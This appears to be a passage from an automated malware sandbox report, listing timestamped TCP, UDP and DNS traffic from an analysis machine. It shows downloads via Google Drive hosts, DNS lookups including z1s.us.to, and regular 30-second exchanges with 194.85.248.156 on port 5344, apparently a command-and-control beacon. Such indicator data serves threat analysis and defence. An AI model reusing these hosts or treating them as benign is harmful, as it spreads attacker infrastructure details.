                                                                                                  Nov 24, 2021 14:17:20.942626953 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:20.942651033 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:20.945605040 CET44349834142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:20.945833921 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:20.955307961 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:20.956017971 CET44349834142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:20.956578970 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:20.958678007 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:20.999844074 CET44349834142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.269804001 CET44349834142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.269896030 CET44349834142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.270067930 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:21.270150900 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:21.271893024 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:21.271908998 CET44349834142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.295633078 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.295655012 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.295977116 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.296350002 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.296364069 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.326816082 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.326993942 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.327142000 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.327434063 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.327891111 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.332683086 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.332813978 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.333113909 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.333479881 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.375858068 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.550611973 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.550838947 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.551229000 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.551438093 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.551469088 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.552020073 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.552234888 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.552267075 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.553488970 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.553683996 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.553724051 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.553931952 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.555761099 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.556061983 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.558598042 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.558876991 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.561100006 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.561284065 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.561292887 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.561527967 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.561533928 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.561924934 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.561930895 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.562279940 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.562383890 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.562390089 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.562553883 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.562634945 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.562907934 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.563133955 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.563138962 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.563329935 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.563718081 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.563939095 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.563946962 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.564127922 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.564460039 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.564659119 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.564667940 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.564907074 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.565202951 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.565341949 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.565349102 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.565587997 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.565932035 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.566401958 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.566407919 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.566596031 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.566709042 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.566950083 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.566956043 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.567260981 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.567445040 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.567639112 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.567647934 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.567861080 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.568202019 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.568424940 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.568433046 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.568665981 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.568964958 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.569122076 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.569128036 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.569340944 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.569725037 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.570136070 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.570141077 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.570413113 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.570435047 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.570667028 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.570673943 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.570936918 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.571211100 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.571465015 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.571470022 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.571691990 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.572010040 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.572130919 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.572314978 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.572319984 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.572402000 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.572706938 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.572853088 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.572979927 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.572998047 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.573028088 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.573033094 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.573129892 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.573132992 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.573533058 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.573728085 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.573746920 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.573786020 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.573806047 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.573905945 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.574040890 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.574527025 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.574642897 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.574707985 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.574712038 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.574716091 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.574796915 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.574887991 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.575377941 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.575603962 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.575624943 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.575902939 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.575910091 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.576437950 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.576443911 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.576478004 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.576620102 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.576781034 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.576786995 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.576858997 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.577080011 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.577284098 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.577419043 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.577557087 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.577596903 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.577605009 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.577785969 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.577893972 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.578152895 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.578321934 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.578352928 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.578357935 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.578488111 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.578490973 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.578695059 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.579114914 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.579267025 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.579288006 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.579421997 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.579540968 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.579545021 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.579629898 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.580008984 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.580018044 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.580179930 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.580236912 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.580243111 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.580341101 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.580420017 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.580424070 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.580602884 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.580992937 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.581145048 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.581242085 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.581248045 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.581324100 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.581511974 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.581516981 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.581686020 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.581752062 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.581912041 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.581918001 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.582025051 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.582029104 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.582331896 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.582334995 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.582792997 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.582813025 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.582844019 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.582847118 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.582968950 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.583319902 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.583324909 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.583545923 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.583551884 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.583581924 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.583677053 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.583873034 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.583878994 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.583933115 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.584043026 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.584208965 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.584355116 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.584371090 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.584403038 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.584580898 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.584589005 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.584594011 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.584748983 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.584753990 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.584902048 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.584947109 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.584952116 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.585028887 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.585082054 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.585163116 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.585167885 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.585298061 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.585357904 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.585748911 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.585876942 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.585895061 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.585932970 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.585982084 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.585988045 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.586007118 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.586009026 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.586138010 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.586658955 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.586838961 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.586860895 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.586889029 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.586894035 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.586894035 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.586899996 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.587027073 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.587033033 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.587076902 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.587081909 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.587335110 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.587688923 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.587817907 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.587842941 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.587858915 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.587893009 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.588144064 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.588150024 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.588412046 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.588555098 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.588699102 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.588814974 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.588818073 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.588821888 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.588862896 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:21.588891029 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.588993073 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.589071989 CET49835443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:21.589081049 CET44349835142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:50.280054092 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:17:50.280704975 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:17:50.370558977 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:18:20.281570911 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:18:20.282114029 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:18:20.370460987 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:18:50.293884039 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:18:50.294424057 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:18:50.370693922 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:19:20.295367956 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:19:20.295984983 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:19:20.370678902 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:19:50.295057058 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:19:50.295566082 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:19:50.370443106 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:20:20.314698935 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:20:20.315227032 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:20:20.558064938 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:20:50.329387903 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:20:50.329952002 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:20:50.557909012 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:21:20.326961040 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:21:20.327564001 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:21:20.558167934 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:21:50.325273991 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:21:50.332315922 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:21:50.558043957 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:22:20.325117111 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:22:20.325815916 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:22:20.464119911 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:22:50.342417002 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:22:50.343126059 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:22:50.557812929 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:23:20.360423088 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:23:20.360997915 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:23:20.557987928 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:23:50.357290030 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:23:50.357846975 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:23:50.557799101 CET534449806194.85.248.156192.168.11.20

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 24, 2021 14:16:12.404258966 CET5102753192.168.11.201.1.1.1
                                                                                                  Nov 24, 2021 14:16:12.413542986 CET53510271.1.1.1192.168.11.20
                                                                                                  Nov 24, 2021 14:16:13.142087936 CET5432253192.168.11.201.1.1.1
                                                                                                  Nov 24, 2021 14:16:13.199888945 CET53543221.1.1.1192.168.11.20
                                                                                                  Nov 24, 2021 14:16:15.609091043 CET6378953192.168.11.201.1.1.1
                                                                                                  Nov 24, 2021 14:16:15.760210991 CET53637891.1.1.1192.168.11.20
                                                                                                  Nov 24, 2021 14:17:05.563827038 CET6295553192.168.11.201.1.1.1
                                                                                                  Nov 24, 2021 14:17:05.602368116 CET53629551.1.1.1192.168.11.20
                                                                                                  Nov 24, 2021 14:17:05.851572037 CET5333153192.168.11.201.1.1.1
                                                                                                  Nov 24, 2021 14:17:05.887257099 CET53533311.1.1.1192.168.11.20

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Nov 24, 2021 14:16:12.404258966 CET192.168.11.201.1.1.10x7b9cStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                                                  Nov 24, 2021 14:16:13.142087936 CET192.168.11.201.1.1.10x2dc8Standard query (0)doc-00-5k-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                                  Nov 24, 2021 14:16:15.609091043 CET192.168.11.201.1.1.10x9504Standard query (0)z1s.us.toA (IP address)IN (0x0001)
